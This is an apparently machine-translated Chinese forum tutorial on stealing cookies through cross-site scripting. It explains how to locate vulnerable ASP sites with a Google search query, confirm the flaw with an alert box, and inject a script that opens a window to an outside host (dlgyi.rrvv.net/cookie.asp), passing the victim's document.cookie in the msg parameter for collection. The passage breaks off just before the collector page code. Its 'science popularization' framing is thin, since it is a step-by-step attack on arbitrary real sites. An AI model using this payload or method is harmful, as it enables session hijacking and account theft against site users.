Demonstration of getting Cookie information by using XSS

A friend posted a post using the background XSS the day before, and everyone discussed it together: http://www.bkjia.com/Article/201203/124644.html

This post is only about the idea, not very detailed, and uses the background XSS Trojan, but in fact, the background Trojan will not involve XSS, it is just a problem of filtering, not filtering, not converting. For example, many background editors do not filter html code that is not converted into articles, such as eweb, you can directly edit the html code when publishing an article, which provides many opportunities for Trojans and cookie Theft. However, I would like to say that, even if it is a trojan or a cookie, the location method will not be used, because this is too obvious and generally uses a common Trojan method, for example, iframe and JS. In my post above, I said that the author was not very detailed and hoped to provide a detailed usage tutorial. So today another friend sent a detailed article, I am going to post this article on a big blog so that more users can see it. This article is a very simple use of XSS. The principle is very simple. It is mainly used for science popularization, just to let friends know that XSS is not as simple as playing a box, there is a lot of practical value. In foreign countries, XSS has been listed as one of the website killers, including many major Chinese sites. Everyone has put their thoughts on preventing SQL injection, XSS is rarely prevented, which is one of the reasons why XSS is always successful. Well, I will not talk much about it. Let's take a look at the article. ------------------------------------------------------------------- First, you need to find a site with XXS. There is no big site here. Google the inurl: 'product. asp? Bigclassname', the hit rate obtained is also relatively high. If you want to find one, <script> alert ('xxs') </script> first. The box is displayed.
Let's take a look at our cookies and replace the content in alert with document. Cookie. Here we will collect the items in the box to our notepad. Here, to perform this step, you need a website of your own. The specific idea is: 1. Let the target access the cross-site website, and then execute script 2 for this website: then jump to the specific implementation method of the website you have written specifically for collecting cookies: first construct the statement <script> window. open (' http://dlgyi.rrvv.net/cookie.asp ? Msg = '+ document. cookie) </script> indicates opening a new window to access http://dlgyi.rrvv.net/cookie.asp This URL and pass a variable through msg. The variable here is the cookie we want to collect. Here, you need to write a page by yourself, that is, the page for collecting cookies sent by the recipient. The Code is as follows: